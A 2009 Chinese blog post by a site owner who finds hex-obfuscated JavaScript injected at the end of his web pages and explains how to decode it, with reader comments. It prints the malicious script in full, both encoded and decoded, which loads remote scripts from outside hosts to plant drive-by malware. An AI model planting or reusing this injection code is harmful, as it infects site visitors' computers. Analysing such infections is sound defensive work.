记忆盒子

把记忆装进灰色的盒子,封装起来,那年那月,重新拾起。

首页搜索目录
search
当前主题: 软件编程

文件尾竟被加入病毒\x64\x6f\x63\x75\x6d\x65\x6e\x74 【解密】

作者:Kaka    时间:2009-12-9 12:33:40    浏览:    评论:9

      今天打开一个自己的网页,竟发现了文件尾巴病毒源,真是可恶,空间商没做好杀毒防毒啊。

      病毒源如下:

 <script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x67\x67\x39\x39\x39\x2e\x35\x31\x36\x36\x2e\x69\x6e\x66\x6f\/\x67\x67\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>
<script language="javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65\x6c\x6e"]("\x3c\x73\x63\x72\x69\x70\x74 \x6c\x61\x6e\x67\x75\x61\x67\x65\x3d\"\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\" \x73\x72\x63\x3d\"\x68\x74\x74\x70\x3a\/\/\x75\x73\x65\x72\x73\x33\x2e\x6a\x61\x62\x72\x79\x2e\x63\x6f\x6d\/\x67\x67\x69\x6e\x66\x6f\/\x69\x6e\x66\x6f\/\x67\x67\x2e\x6a\x73\"\x3e\x3c\/\x73\x63\x72\x69\x70\x74\x3e")
</script>

      这是一段通过16进制编码的script病毒,当你打开含有这段代码的页面时,那你的电脑立马中毒,好狠啊!

      可以通过alert来解密,例如把上面粗体字代码解密:

<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74");</script>

      解密结果是:

      同样的,把后面各个中括号里的代码段alert,结果这个病毒源代码就出来了。上面的病毒源代码解密结果是:

document.write("<script language=javascript src=http://gg999.5166.info/gg/gg.js></script>");

       很明显,这是在你电脑执行一段javascript挂马程序,一旦你打开含有这段代码的页面,你的电脑就立即中招了。

      这些病毒我暂时没找到专杀软件,例如你有上千个页面都中毒了,那是不能手动一个一个清除的了。一旦我找到专杀软件,会第一时间来博客共享。有网友发现专杀软件了吗?

x

标签: Program  

※ 网站速度慢?试试网站自动优化工具 ※

上一篇: AMAZING! 卡卡网主站一个点击价格竟超过博客50个点击!
下一篇: 在GoDaddy安装Z-Blog不成功
  • 8.m******
  • 遇到那些也是很难得的,分析分析,也许可以分析出个oady来,那个值钱有用了.
    Liwen 于 2009-12-12 5:05:40 回复
    别说难遇到,我宁愿永远都不遇到呢!Hehe
  • 2009/12/12 4:21:18 回复该留言
  • 6.e****
  • 汗 ~ 真是辛苦那些黑客弄那么麻烦 ~
    Liwen 于 2009-12-9 17:22:50 回复
    呵呵~~Hehe
  • 2009/12/9 16:22:36 回复该留言
  • 5.百**
  • 真是害人不浅,BZ被害到了,
    Liwen 于 2009-12-9 17:22:36 回复
    是害人不浅Angry
  • 2009/12/9 15:45:47 回复该留言
  • 3.九*
  • 那个脚本无法下载啊,这是为什么呢???
    Liwen 于 2009-12-9 17:22:04 回复
    哪里下载?What
  • 2009/12/9 15:12:51 回复该留言
  • 2.九*
  • 你的网页上?怎么可能上传到你的网页呢?我下载下来那JS看看到底有咋了不起的。
    Liwen 于 2009-12-9 17:21:42 回复
    空间商没防好毒啊Sad
  • 2009/12/9 15:07:43 回复该留言
  • 1.娱***
  • 真的是很牛呀,病毒制作者厉害。
    Liwen 于 2009-12-9 14:58:02 回复
    是啊,害人不浅!Angry
  • 2009/12/9 14:33:16 回复该留言

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

订阅博客                   QQ交流群(312716741)

  • 通过Google订阅本站 通过鲜果订阅本站 通过抓虾订阅本站
  • 通过QQ邮箱订阅本站 通过Yahoo订阅本站 通过有道订阅本站

Search

最新评论及回复

最近留言

网站分类

Powered By Z-Blog 1.8 Walle Build 91204 Designed by Han'space

Copyright @2009-2024 All Rights Reserved. 粤ICP备14028160号-1

Powered By Z-Blog 1.8 Walle Build 91204
Copyright @2009-2024 All Rights Reserved.